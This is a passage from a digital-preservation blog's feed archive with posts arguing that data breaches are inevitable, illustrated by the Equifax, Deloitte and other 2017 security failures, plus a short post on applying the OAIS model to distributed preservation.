href="https://ipres2017.jp/wp-content/uploads/36Angela-Dappert.pdf"><i>Permanence of the Scholarly Record: Persistent Identification and Digital Preservation – A Roadmap</i></a> by Angela Dappert and Adam Farquhar.</li><li><a href="https://ipres2017.jp/wp-content/uploads/61Remco-van-Veenendaal.pdf"><i>Getting Persistent Identifiers Implemented By ‘Cutting In The Middle-Man’</i></a> by Remco van Veenendaal, Marcel Ras and Marie Claire Dangerfield.</li></ul>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-22264993428189294192017-10-05T08:00:00.002-07:002017-10-11T09:19:25.495-07:00Living With InsecurityMy post <a href="http://blog.dshr.org/2017/10/not-whether-but-when.html"><i>Not Whether But When</i></a> took off from the Equifax breach, attempting to explain why the Platonic ideal of a computer system storing data that is safe against loss or leakage cannot exist in the real world. Below the fold, I try to cover some of the implications of this fact.<br /><a name='more'></a><br />This is the <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">most interesting aspect of the Equifax breach:</a><br /><blockquote class="tr_bq">If the Equifax breach was a purely criminal act, one would expect at least some of the stolen data, especially the credit card numbers that were taken, to have showed up for sale on the black market. That hasn’t happened. ... “This wasn't a credit card play," said one person familiar with the investigation. "This was a 'get as much data as you can on every American’ play.</blockquote>In that way it is similar to the <a href="http://arstechnica.com/security/2015/06/epic-fail-how-opm-hackers-tapped-the-mother-lode-of-espionage-data/">hack of the Office of Personnel Management</a>, the <a href="http://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/">hack of health insurers including Anthem</a>, and others.What are the bad guys interested in?<br /><br />First, like the OPM hack, they are looking for <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">information on specific individuals</a> they think can be recruited, blackmailed or defrauded:<br /><blockquote class="tr_bq">Besides amassing data on nearly every American adult, the hackers also sought information on specific people. It's not clear exactly why, but there are at least two possibilities: They were looking for high-net-worth individuals&nbsp;to defraud, or they wanted the financial details of people with potential intelligence value.</blockquote>Second, they are stockpiling ammunition for a possible cyber Armageddon. Remember how during 2014 the <a href="https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Summary+What+we+know+so+far/17633/1">Moon Worm</a> was crawling the Internet looking for vulnerable home routers, then at Christmas the network of home routers was used to DDOS the <a href="http://krebsonsecurity.com/2014/12/cowards-attack-sony-playstation-microsoft-xbox-networks/">gaming networks of Microsoft's Xbox and Sony's Playstation</a>? And how, a year ago, a similar process of stealthy resource accumulation and sudden attack allowed the <a href="http://blog.dshr.org/2016/10/updates-on-dyn-ddos.html">Mirai botnet</a> to take down a major DNS provider? Mirai was the work of just <a href="https://krebsonsecurity.com/2016/10/spreading-the-ddos-disease-and-selling-the-cure/">a couple of guys</a>., and it was not the worst they could have done. As I wrote in <a href="http://blog.dshr.org/2016/10/you-were-warned.html"><i>You Were Warned</i></a>:<br /><blockquote class="tr_bq">A more sophisticated tool than Mirai that used known vulnerabilities (such as the <a href="https://www.akamai.com/us/en/about/news/press/2016-press/akamai-threat-research-team-identifies-openssh-vulnerability.jsp">12-year-old SSH bug</a>) could create a botnet with say 20% of the IoT, a 100 exabit/sec DDoS capability. With the <a href="https://www.shodan.io/">Shodan search engine</a>, the source for Mirai and a set of known vulnerabilities, this is within the capability of ordinarily competent programmers. It could almost certainly take the entire Internet down.</blockquote>Major criminal organizations, let alone nation states, have vastly greater resources than the Mirai guys. It is safe to assume that they have stockpiled the cyber equivalent of nuclear weapons, meaning that there are many actors out there capable at short notice of having much more severe impacts than Mirai's inability to tweet.<br /><br />For example, impacts on the financial system. Having your individual credit and ATM cards stop working is annoying. Having <i>everyone's</i> cards stop working <i>simultaneously</i> crashes the economy. Cards stopping working, as happened last June in Ukraine, would be just the start. Ben Sullivan's <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html"><i>A Hacker’s Guide to Destroying the Global Economy</i></a> is based on 2015's <a href="https://www.theregister.co.uk/2015/11/19/resilient_shield/">Operation Resilient Shield</a>. Sullivan <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">writes</a>:<br /><blockquote class="tr_bq">cyberforces representing the U.S. and the U.K. commenced a joint exercise, the culmination of more than eight months of meticulous planning. Government and independent cybersecurity researchers, working alongside leading global financial firms, simulated their worst-case cyber scenario: a large-scale, coordinated attack on the financial sectors of the Western world’s biggest economies</blockquote>Sullivan <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">points out that</a>:<br /><blockquote class="tr_bq">Banks and financial institutions are not strangers to cyberattacks. A March 2017 report commissioned by Accenture found that a typical financial services organization will face an average of 85 targeted breach attempts every year, a staggering third of which will be successful. “Financial institutions across the world are a constant target for attackers, from nation-state hackers looking to cause disruption to old-fashioned criminals looking to steal vast sums of money,” says Lee Munson, a security researcher at Comparitech.</blockquote>These are individual, un-coordinated attacks, and one in three succeeds. Resilient Shield war-gamed a coordinated attack of the kind <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">Sullivan leads his piece with</a>:<br /><blockquote class="tr_bq">Overnight, unknown attackers had hijacked the websites and online customer portals of every single bank in the country. From the outside, nothing seemed amiss. In reality, a cyberheist on an unprecedented scale was underway.<br /><br />The attackers were stealing login credentials from unsuspecting customers who thought they were visiting their banks’ websites but were in fact being redirected to bogus reproductions thanks to the hackers’ modification of the banks’ Domain Name System registrations. ... The attackers weren't just pilfering login credentials, though. Customers were infected with data-stealing malware from the hijacked bank websites, while the attackers simultaneously redirected the information of all ATM withdrawals and point-of-sale platforms to their own systems, hoovering up even more credit card information on the nation’s unsuspecting citizens.<br />...<br />The worst was yet to come. It wasn’t long before the issues at the stock exchange started. ... Rapid fluctuations started destabilizing the entire country’s economy within minutes; billions were wiped off the region’s largest companies’ market valuations. ... The lines stretched for blocks, but the ATMs were empty. ... This was all in the first four hours. The money stopped for two weeks. The effects could last a lifetime.</blockquote>Kim Zetter at <i>The Intercept</i> has a readable overview of the <a href="https://theintercept.com/2017/10/04/masquerading-hackers-are-forcing-a-rethink-of-how-attacks-are-traced/">increasing difficulty of figuring out who is behind attacks like this, or "attributing" them</a>:<br /><blockquote>The growing propensity of government hackers to reuse code and computers from rival nations is undermining the integrity of hacking investigations and calling into question how online attacks are attributed, according to researchers from Kaspersky Lab.</blockquote>This is a <a href="https://theintercept.com/2017/10/04/masquerading-hackers-are-forcing-a-rethink-of-how-attacks-are-traced/">big problem</a>:<br /><blockquote>Though copying techniques is common for the NSA, two former NSA hackers tell The Intercept they never saw the agency re-use actual code during their time there and say they doubt the agency would conduct a false flag operation.<br /><br />“When we catch foreign-actor tools we’ll steal the techniques themselves,” one of the sources told The Intercept. But “there are a host of issues when you falsely attribute … you could start a war that way.</blockquote>Or even start a war with a correct attribution. But if you can't be <i>sure</i> whether the attack originates from Eastasia or is really some skilled Freedonians masquerading as Eastasian so that Eastasia gets nuked but Freedonia doesn't get the blame, what can you do? Nuke them both? Do nothing?<br /><br />The reason we still have an Internet and a banking system is MAD (Mutually Assured Destruction) or, looked at another way, that no-one wants to kill the goose that is laying so many golden eggs. <a href="http://www.institutionalinvestor.com/article/3751923/banking-and-capital-markets-banking/a-hackers-guide-to-destroying-the-global-economy.html">Sullivan writes</a>:<br /><blockquote class="tr_bq">Between them, McGregor and Truppi have investigated dozens of cyberattacks against U.S. financial institutions, and they say that working out why a bank might have been attacked often leads to discovering who attacked it, and how. “A good example: China is not going to hack United States infrastructure and take down the trading platform, because that would affect them economically,” says Truppi. “What China would try to do is hack banking institutions and gain the upper hand with information, maybe information on mergers and acquisitions or other information on companies.”<br /><br />On the other hand, Truppi says, attacks like those purportedly deployed by North Korea on South Korea are designed to wreak havoc on society. “The reason they have been able to take those destructive approaches is because they’re not economically entwined with the U.S. in any way, shape, or form. It’s making a statement,” he says.</blockquote>I'm skeptical that North Korea's decision makers would want to crash the world's, or even the US' economy. Little if any of what distinguishes their lifestyle from that of the North Korean in the street originates in North Korea.<br /><br />This is another way in which the nuclear analogy in Maciej Cegłowski's <a href="http://idlewords.com/talks/haunted_by_data.htm"><i>Haunted by Data</i></a> can be considered. Stockpiling digital ammunition is like hoarding nuclear weapons hoping that by doing so you never have to use them. But the analogy breaks down along two axes:<br /><ul><li>Nuclear weapons are so expensive to create that only nation-states have them (we hope). But cyber-nukes are cheap enough that we face the equivalent of Raven, the character in <a href="https://en.wikipedia.org/wiki/Snow_Crash">Neal Stephenson's <i>Snow Crash</i></a> who has a nuke in the sidecar of his Harley, and POOR IMPULSE CONTROL tattooed across his forehead.</li><li>For high-yield nuclear weapons the attribution problem is addressed by satellites and radar that track the missiles from close to their launch. But cyber-nukes are more like the <a href="https://en.wikipedia.org/wiki/Suitcase_nuclear_device">suitcase nuclear devices</a> developed by both the US and the USSR. The idea was to smuggle the devices onto the enemy's territory where they could be detonated with no warning. During the Cold War attribution was trivial, based on the assumption that the combatants retained control of their nukes. But this may <a href="https://en.wikipedia.org/wiki/Suitcase_nuclear_device">no longer be the case</a>:<br /><blockquote class="tr_bq">Former Russian National Security Adviser <a href="https://en.wikipedia.org/wiki/Aleksandr_Lebed">Aleksandr Lebed</a> in an interview with <a href="https://en.wikipedia.org/wiki/CBS" title="CBS">CBS</a> newsmagazine <i><a href="https://en.wikipedia.org/wiki/Sixty_Minutes">Sixty Minutes</a></i> on 7 September 1997 claimed that the Russian military had lost track of more than a hundred out of a total of 250 "suitcase-sized nuclear bombs".</blockquote></li></ul>An environment of rampant proliferation and obscure attribution is, to say the least, destabilizing. This particularly true of <a href="https://en.wikipedia.org/wiki/Asymmetric_warfare">asymmetric warfare</a> where the cost of the attack is vastly less than the cost of an effective defense (think <a href="https://en.wikipedia.org/wiki/Improvised_explosive_device">IEDs</a>). This is almost always the case in cyberspace, which is why cyber-crime is so profitable. For example, <a href="http://blog.dshr.org/2015/06/alphaville-on-bitcoin.html">two years ago I wrote</a>:<br /><blockquote class="tr_bq">An attacker with zero-day exploits for each of the three major operating systems on which blockchain software runs could use them to take over the blockchain. There is a <a href="http://www.wired.com/2015/04/therealdeal-zero-day-exploits/" rel="nofollow">market for zero-day exploits</a>, so we know how much it would cost to take over the blockchain. Good operating system zero-days are reputed to sell for $250-500K each, so it would cost about $1.5M to control the Bitcoin blockchain, currently representing nearly $3.3B in capital. That's 220,000% leverage! Goldman Sachs, eat your heart out. </blockquote>What to do? In <a href="http://idlewords.com/talks/haunted_by_data.htm"><i>Haunted by Data</i></a> Maciej Cegłowski makes three recommendations:<br /><blockquote>Don't collect it!<br /><br />If you can get away with it, just don't collect it! Just like you don't worry about getting mugged if you don't have any money, your problems with data disappear if you stop collecting it.<br />...<br />If you have to collect it, don't store it!<br /><br />Instead of stocks and data mining, think in terms of sampling and flows. "Sampling and flows" even sounds cooler. It sounds like hip-hop!<br /><br />If you have to store it, don't keep it!<br /><br />Certainly don't keep it forever. Don't sell it to <a href="http://www.itworld.com/article/2710610/it-management/acxiom-exposed--a-peek-inside-one-of-the-world-s-largest-data-brokers.html">Acxiom</a>! Don't put it in Amazon glacier and forget it.</blockquote>I have a different view. People tend to think that security is binary, a system either is or is not secure. But we see that in practice no system, <a href="https://en.wikipedia.org/wiki/The_Shadow_Brokers">not even the NSA's</a>, is secure. We need to switch to a scalar view, systems are more or less secure. Or, rather, treat security breaches like radioactive decay, events that happen randomly with a probability per unit time that is a characteristic of the system. More secure systems have a lower probability of breach per unit time. Or, looked at another way, data leakage is characterized by a half-life, the time after which there is a 50% probability that the data will have leaked. Data that is deleted long before its half-life has expired is unlikely to leak, but it could. Data kept forever is certain to leak. These leaks need to be planned for, not regarded as exceptions.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com9tag:blogger.com,1999:blog-4503292949532760618.post-31389513555730147592017-10-04T08:00:00.000-07:002017-10-08T17:15:51.638-07:00OAIS & Distributed Digital PreservationOne of the lessons from the <a href="http://blog.dshr.org/2014/08/trac-audit-lessons.html">TRAC audit of the CLOCKSS Archive</a> was the mis-match between the OAIS model and distributed digital preservation:<br /><blockquote class="tr_bq"><b>CLOCKSS has a centralized organization but a distributed implementation</b>. Efforts are under way to reconcile the completely centralized OAIS model with the <a href="http://purl.pt/24107/1/iPres2013_PDF/Creating%20a%20Framework%20for%20Applying%20OAIS%20to%20Distributed%20Digital%20Preservation.pdf">reality of distributed digital preservation</a>, as for example in collaborations such as the <a href="http://www.metaarchive.org/">MetaArchive</a> and between the <a href="http://www.kb.dk/en/">Royal and University Library</a> in Copenhagen and the <a href="http://library.au.dk/en/">library of the University of Aarhus</a>. Although the organization of the CLOCKSS Archive is centralized, serious digital archives like CLOCKSS require a distributed implementation, if only to achieve geographic redundancy. The OAIS model fails to deal with distribution even at the implementation level, let alone at the organizational level.</blockquote>It is appropriate on the <a href="http://blog.dshr.org/2013/10/it-was-fifteen-years-ago-today.html">19<sup>th</sup> anniversary of the LOCKSS Program</a> to point to <a href="https://vimeo.com/233024801">a 38-minute video about this issue</a>, posted last month. In it Eld Zierau lays out the Outer OAIS - Inner OAIS model that she and Nancy McGovern have developed to resolve the mis-match, and <a href="https://digitalbevaring.dk/wp-content/uploads/2014/12/Zierau_McGovern_Outer_Inter_OAIS.pdf">published at iPRES 2014</a>.<br /><br />They apply OAIS hierarchically, first to the distributed preservation network as a whole (outer), and then to each node in the network (inner). This can be useful in delineating the functions of nodes as opposed to the network as a whole, and in identifying the single points of failure created by centralized functions of the network as a whole.<br /><br />While I'm promoting videos, I should also point to <a href="http://arquivo.pt/">Arquivo.pt</a>'s excellent video for a general audience about the <a href="https://youtu.be/YVqFey7hVJc">importance of Web archiving</a>, with subtitles in English.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-63078069159667885722017-10-03T08:00:00.004-07:002017-10-03T08:00:18.380-07:00Not Whether But WhenRichard Smith, the CEO of Equifax while the company leaked personal information on most Americans (and suffered <a href="https://krebsonsecurity.com/2017/05/fraudsters-exploited-lax-security-at-equifaxs-talx-payroll-division/">at least one more leak</a> that was active for about a year up to last March) was held accountable for these failings by being allowed to <a href="http://fortune.com/2017/09/26/equifax-ceo-richard-smith-net-worth/">retire with a mere $90M</a>. But at <i>Fortune</i>, John Patrick Pullen quotes him as <a href="http://fortune.com/2017/09/29/equifax-ceo-hack-worry/">uttering an uncomfortable truth</a>:<br /><blockquote class="tr_bq">"There's those companies that have been breached and know it, and there are those companies that have been breached and don't know it,"</blockquote>Pullen <a href="http://fortune.com/2017/09/29/equifax-ceo-hack-worry/">points out that</a>:<br /><blockquote class="tr_bq">The speech, given by Smith to students and faculty at the university's Terry College of Business, <a href="https://www.youtube.com/watch?v=lZzqUnQg-Us">covered a lot of ground</a>, but it frequently returned to security issues that kept the former CEO awake at night—foremost among them was the company's large database.</blockquote><a href="http://fortune.com/2017/09/29/equifax-ceo-hack-worry/">Smith should have been losing sleep</a>:<br /><blockquote class="tr_bq">Though it was still 21 days before his company would reveal that it had been massively hacked, Equifax, at that time, had been breached and knew it.</blockquote>Two years ago, the amazing Maciej Cegłowski gave one of his <a href="https://boingboing.net/2015/10/05/botwars-vs-ad-tech-the-origin.html">barn-burning speeches</a>, entitled <a href="http://idlewords.com/talks/haunted_by_data.htm"><i>Haunted by Data</i></a> (my emphasis):<br /><blockquote class="tr_bq">imagine data not as a pristine resource, but as a waste product, a bunch of radioactive, toxic sludge that we don’t know how to handle. In particular, I'd like to draw a parallel between what we're doing and nuclear energy, another technology whose beneficial uses we could never quite untangle from the harmful ones. A singular problem of nuclear power is that it generated deadly waste whose lifespan was far longer than the institutions we could build to guard it. Nuclear waste remains dangerous for many thousands of years. This oddity led to extreme solutions like 'put it all in a mountain' and 'put a scary sculpture on top of it' so that people don't dig it up and eat it. <b>But we never did find a solution. We just keep this stuff in swimming pools or sitting around in barrels</b>.</blockquote>The fact is that, just like nuclear waste, <b>we have never found a solution to the interconnected problems of keeping data stored in real-world computer systems safe from attack and safe from leaking</b>. It isn't a question of <i>whether</i> the bad guys will get in to the swimming pools and barrels of data, and exfiltrate it. It is simply <i>when</i> they will do so, and how long it will take you to find out that they have. Below the fold I look at the explanation for this fact. I'll get to the implications of our inability to maintain security in a subsequent post.<br /><a name='more'></a><br />To summarize the explanation, it is that real-world computer systems are embedded in real-world organizations. It might be possible to build a system that was secure when embedded in an ideal organization, but it definitely isn't possible to build a system that remains secure when embedded in a real-world organization.<br /><br />At Bloomberg, Michael Riley, Jordan Robertson, and Anita Sharpe have a detailed report on the <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">organizational background to the Equifax leak</a> of personal information on most Americans, and the earlier problem that <a href="https://krebsonsecurity.com/2017/05/fraudsters-exploited-lax-security-at-equifaxs-talx-payroll-division/">allowed the bad guys to file fake tax returns and claim large refunds</a>. They report that initially, CEO Smith considered security a priority <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">but it didn't last</a>:<br /><blockquote class="tr_bq">Not long after becoming CEO, he hired Tony Spinelli, a well-regarded cyber expert, to overhaul the company's security. ... Apparently, gaps remained. After the breach became public in September, Steve VanWieren, a vice president of data quality who left Equifax in January 2012 after almost 15 years, wrote in a post on LinkedIn that "it bothered me how much access just about any employee had to the personally identifiable attributes. ... Spinelli left in 2013, followed less than a year later by his top deputy, Nick Nedostup. Many rank and file followed them out the door, and key positions were filled by people who were not well-known in the clubby cybersecurity industry.</blockquote>Smith's replacement for Spinelli was:<br /><blockquote>Susan Mauldin, a former security chief at First Data Corp., to run the global security team. Mauldin introduced herself to colleagues as a card-carrying member of the National Rifle Association, according to a person familiar with the changes.</blockquote>That alone should have disqualified her; it shows that in her personal life she preferred the security theater of waving a big gun around to the data showing that <a href="https://dx.doi.org/10.1056/NEJM199310073291506">gun-owners are a bigger threat to their family</a> than to the bad guys. She wasn't effective at making security a priority:<br /><blockquote>“Internally, security was viewed as a bottleneck,” one person said. “There was a lot of pressure to get things done. Anything related to IT was supposed to go through security." ... But one former security leader said he finally joined the talent exodus because it felt like he was working with the “B&nbsp;team.”</blockquote>That's because he <i>was</i> on the B team. Given the incentives facing a CEO, the A team at the company will always be the one boosting the bottom line this quarter, the pervasive effect of short-termism. At Equifax CEO Smith had things he needed to get done:<br /><blockquote class="tr_bq">Smith acquired two dozen companies that have given Equifax new ways to package and sell data, while expanding operations to 25 countries and 10,000 employees. Business was good—the company’s stock price quadrupled under Smith’s watch,</blockquote>All two dozen companies had incompatible systems that needed to be integrated into Equifax's by the end of the next quarter so that the stock continued to rise. While, of course, ensuring that these external systems contained no vulnerabilities, that none were introduced during the integration, and that none of the new employees posed an insider threat. In at least one case, this process clearly failed. <a href="https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/">Brian Krebs reported that</a>:<br /><blockquote class="tr_bq">an online portal designed to let Equifax employees in Argentina manage credit report disputes from consumers in that country <i>was wide open, protected by perhaps the most easy-to-guess password combination ever: “admin/admin.”</i><br />...<br />Once inside the portal, the researchers found they could view the names of more than 100 Equifax employees in Argentina, as well as their employee ID and email address. The “list of users” page also featured a clickable button that anyone authenticated with the “admin/admin” username and password could use to add, modify or delete user accounts on the system. ...<br /><br />Each employee record included a company username in plain text, and a corresponding password that was obfuscated by a series of dots.<br /><br />However, all one needed to do in order to view said password was to right-click on the employee’s profile page and select “view source,” a function that displays the raw HTML code which makes up the Web site. Buried in that HTML code was the employee’s password in plain text.<br /><br />A review of those accounts shows all employee passwords were the same as each user’s username. Worse still, each employee’s username appears to be nothing more than their last name, or a combination of their first initial and last name. In other words, if you knew an Equifax Argentina employee’s last name, you also could work out their password for this credit dispute portal quite easily.</blockquote>It wasn't just employee's information that was at risk:<br /><blockquote>From the main page of the Equifax.com.ar employee portal was a listing of some 715 pages worth of complaints and disputes filed by Argentinians who had at one point over the past decade contacted Equifax via fax, phone or email to dispute issues with their credit reports. The site also lists each person’s <a href="javascript:void(0)" target="_blank">DNI</a> — the Argentinian equivalent of the Social Security number — again, in plain text. All told, this section of the employee portal included more than 14,000 such records.</blockquote>Clearly no-one at the C-level in Equifax was going to give priority to the security of some penny-ante dispute resolution portal in Argentina. But it is very likely that, had it been the bad guys snooping around, they would have found links from this system to others on Equifax's network, and been able to get in this way too.<br /><br />The Argentinian dispute resolvers need to get their work done. They didn't have the resources to pay a top-flight developer to build a system for them, the more so because dispute resolution doesn't fatten the bottom line. So they kludged something together and, not being security gurus, made lots of mistakes.<br /><br />You may be thinking Equifax is unusually incompetent. But this is what CEO Smith got right. It isn't possible for an organization to restrict security-relevant operations to security gurus who never make mistakes; there aren't enough security gurus to go around, and even security gurus make mistakes. It only takes one mistake, in Equifax's case a delay of more than four days in patching a bug in widely used Web infrastructure, to <a href="https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros">let the bad guys in</a>:<br /><blockquote class="tr_bq">Information [Nike Zheng] provided to Apache, which published it along with a fix on March&nbsp;6, showed how the flaw could be used to steal data from any company using the software. ... Within 24 hours, the information was posted to FreeBuf.com, a Chinese security website, and showed up the same day in Metasploit, a popular free hacking tool. On March 10, hackers scanning the internet for computer systems vulnerable to the attack got a hit on an Equifax server in Atlanta,</blockquote>The delay was, in fact, far worse. In Congressional testimony, <a href="https://arstechnica.com/information-technology/2017/10/a-series-of-delays-and-major-errors-led-to-massive-equifax-breach/">ex-CEO Smith revealed that</a>:<br /><blockquote class="tr_bq">an Equifax e-mail directing administrators to patch a critical vulnerability in the open source Apache Struts Web application framework went unheeded, despite a two-day deadline to comply. Equifax also waited a week to scan its network for apps that remained vulnerable. Even then, the delayed scan failed to detect that the code-execution flaw still resided in a section of the sprawling Equifax site that allows consumers to dispute information they believe is incorrect.<br />...<br />Although a patch for the code-execution flaw was available during the first week of March, Equifax administrators <a href="https://arstechnica.com/tech-policy/2017/09/equifax-cio-cso-retire-in-wake-of-huge-security-breach/">didn't apply it until July 29</a>,</blockquote>Other recent examples of organizational security incompetence include <a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">Deloitte</a>:<br /><blockquote class="tr_bq">analyst firm Gartner ... in June <a href="https://www2.deloitte.com/cy/en/pages/about-deloitte/articles/deloitte-ranked-1-gartner-in-security-consulting-for-5th-consecutive-year.html" rel="nofollow" target="_blank">named Deloitte</a> the world’s best IT security consultancy for the fifth year in a row. </blockquote>On September 25th it was <a href="https://www.theregister.co.uk/2017/09/25/deloitte_email_breach/">revealed that Deloitte was</a>:<br /><blockquote class="tr_bq">the victim of a cybersecurity attack that went unnoticed for months. ... The Guardian understands Deloitte discovered the hack in March this year, but it is believed the attackers may have had access to its systems since October or November 2016. ... The hacker compromised the firm’s global email server through an “administrator’s account” that, in theory, gave them privileged, unrestricted “access to all areas”. The account required only a single password and did not have “two-step“ verification, sources said.</blockquote>This motivated others to start looking at. By the next day, it was obvious that&nbsp; <a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">Deloitte's security wasn't up to scratch</a>. For example(9/26):<br /><blockquote class="tr_bq">a collection of Deloitte's corporate VPN passwords, user names, and operational details were found lurking within a public-facing GitHub-hosted repository. These have since been removed in the past hour or so. In addition, it appears that a Deloitte employee uploaded company proxy login credentials to his public Google+ page. The information was up there for over six months – and was removed in the past few minutes.</blockquote><a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">And also</a>:<br /><blockquote class="tr_bq">Deloitte has loads of internal and potentially critical systems unnecessarily facing the public internet with remote-desktop access enabled. All of this gear should be behind a firewall and/or with two-factor authentication as per industry best practices. ... “Just in the last day I’ve found 7,000 to 12,000 open hosts for the firm spread across the globe,” security researcher Dan Tentler, founder of Phobos Group, told <i>The Register</i> today. “We’re talking dozens of business units around the planet with dozens of IT departments showing very different aptitude levels. The phrase ‘truly exploitable’ comes to mind.”</blockquote><a href="https://www.theregister.co.uk/2017/09/26/deloitte_leak_github_and_google/">Not to mention</a>:<br /><blockquote class="tr_bq">a Deloitte-owned Windows Server 2012 R2 box in South Africa with RDP wide open, acting as what appears to be an Active Directory server – a crucial apex of a Microsoft-powered network – and with, worryingly, security updates still pending installation.</blockquote>If the "security consultancy of the year" for the last five years straight can't get its act together, and nor can <a href="http://arstechnica.com/security/2015/06/stepson-of-stuxnet-stalked-kaspersky-for-months-tapped-iran-nuke-talks/">security vendor Kaspersky</a>, what chance has a <a href="https://arstechnica.com/information-technology/2017/09/in-spectacular-fail-adobe-security-team-posts-private-pgp-key-on-blog/">company like Adobe</a>(9/22):<br /><blockquote class="tr_bq">Adobe's Product Security Incident Response Team (PSIRT) took that transparency a little too far today when a member of the team posted the PGP keys for PSIRT's e-mail account—both the public <i>and</i> the private keys.</blockquote><a href="https://arstechnica.com/information-technology/2017/09/password-theft-0day-imperils-users-of-high-sierra-and-earlier-macos-versions/">Or Apple</a>(9/26):<br /><blockquote class="tr_bq">There's a vulnerability in High Sierra and earlier versions of macOS that allows rogue applications to steal plaintext passwords stored in the Mac keychain, a security researcher said Monday.</blockquote>Or the companies targeted in the attack Cisco found that used the <a href="https://www.techdirt.com/articles/20170921/11032238260/ccleaner-hack-may-have-been-state-sponsored-attack-18-major-tech-companies.shtml">popular CCleaner application as a distribution channel</a>, including(9/18):<br /><blockquote class="tr_bq">at least 18 technology giants, including Intel, Google, Microsoft, Akamai, Samsung, Sony, VMware, HTC, Linksys, D-Link and Cisco itself</blockquote>Karl Bode at TechDirt has the first one I've found today (10/3), a <a href="https://www.techdirt.com/articles/20170926/09162938285/auto-location-tracking-company-leaves-customer-data-exposed-online.shtml">vehicle tracking company's database in a public Amazon S3 bucket</a>:<br /><blockquote class="tr_bq">this one is notable for its high creep factor. SVR advertises that its technology provides “continuous vehicle tracking, every two minutes when moving” and a “four hour heartbeat when stopped.” That means that a hacker that had gained access to the login data would be able to track everywhere a customer's car has been in the past 120 days.</blockquote>Richard Forno of Stanford Law School's Center for Internet and Society points out <a href="http://cyberlaw.stanford.edu/blog/2017/09/equifax-reminder-larger-cybersecurity-problems">additional reasons for complacency about security</a>:<br /><blockquote class="tr_bq">Companies can purchase insurance policies to cover the costs of response to, and recovery from, security incidents like data breaches. <a href="http://www.insurancejournal.com/news/national/2017/09/11/463769.htm">Equifax’s policy</a>, for example, is reportedly more than US$100 million; Sony Pictures Entertainment had in place a <a href="http://www.propertycasualty360.com/2014/12/18/sony-pictures-holds-60-million-cyber-policy-with-m">$60 million policy</a> to help cover expenses after its 2014 breach.<br /><br />This sort of business arrangement – simply transferring the financial risk from one company to another – doesn’t solve any underlying security problems. And since it leaves behind only the risk of some bad publicity, the company’s sense of urgency about proactively fixing problems might be reduced. In addition, it doesn’t address the harm to individual people – such as those whose entire financial histories Equifax stored – when security incidents happen.</blockquote><a href="http://cyberlaw.stanford.edu/blog/2017/09/equifax-reminder-larger-cybersecurity-problems">And</a>:<br /><blockquote class="tr_bq">when cybersecurity problems happen, many companies start offering purported solutions: One industry colleague called this the computer equivalent of “ambulance chasing.” For instance, less than 36 hours after the Equifax breach was made public, the <a href="https://www.bloomberg.com/news/articles/2017-09-13/after-the-equifax-hack-lifelock-sign-ups-jump-tenfold">company’s competitors and other firms</a> increased their advertising of security and identity protection services. But those companies <a href="https://www.wired.com/2015/07/lifelock-failed-one-job-protecting-data/">may not be secure themselves</a>.&nbsp; ...&nbsp; when companies discover that they can make more money selling to customers whose security is violated rather than spending money to keep data safe, they realize that it’s profitable to remain vulnerable.</blockquote>I could keep going, but you get the idea. The supply of incompetence is endless. So also is the supply of vulnerabilities, as shown by the really important 2010 paper by Sandy Clarke, Matt Blaze, Stefan Frei and Jonathan Smith entitled <a href="http://dx.doi.org/10.1145/1920261.1920299"><i>Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities</i></a>. They show that, the older a software code base, the greater the rate at which zero-day vulnerabilities are found. So <b>even if an organization is staffed exclusively by infallible security gurus, it will still get compromised</b> via a zero-day.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com33tag:blogger.com,1999:blog-4503292949532760618.post-90600680390357100352017-09-28T08:00:00.003-07:002017-09-28T08:00:01.064-07:00Web DRM Enables Innovative Business ModelEarlier this year I wrote at length about the <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html">looming disaster that was Web DRM</a>, or the W3C's Encrypted Media Extensions (EME). Ten days ago, after unprecedented controversy, a narrow majority of <a href="https://arstechnica.com/gadgets/2017/09/drm-for-html5-published-as-a-w3c-recommendation-after-58-4-approval/">W3C members made EME official</a>.<br /><br />So now I'm here to tell you the good news about how the combination of EME and the blockchain, today's sexiest technology, solves the most pressing issue for the Web, a sustainable business model. Innovators like the <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">Pirate Bay</a> and <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">Showtime</a> are already experimenting with it. They have yet to combine it with EME and gain the full benefit. Below the fold, I explain the details of this amazing new business opportunity. Be one of the first to effortlessly profit from the latest technology!<br /><a name='more'></a><br />The Web has two traditional business models. As I wrote back in March, <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html">both are struggling</a>:<br /><blockquote><ul><li>Paywalled content. It turns out that, apart from movies and academic publishing, only a very few premium brands such as <a href="https://www.economist.com/"><i>The Economist</i></a>, the <a 